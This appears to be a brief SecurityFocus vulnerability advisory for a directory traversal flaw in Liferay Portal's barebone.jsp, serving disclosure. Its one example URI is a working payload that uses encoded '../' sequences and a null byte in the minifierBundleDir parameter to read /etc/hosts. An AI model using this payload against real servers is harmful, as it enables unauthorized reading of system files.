Liferay Portal 'barebone.jsp' Directory Traversal Vulnerability

The following example URI is available:

https://www.example.com/html/js/barebone.jsp?browserId=firefox&themeId=sometheme&colorSchemeId=01&minifierType=js&minifierBundleId=javascript.barebone.files&*minifierBundleDir**=**/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E%2Fetc%2Fhosts%00.html*&t=1429132297000


 

Privacy Statement
Copyright 2010, SecurityFocus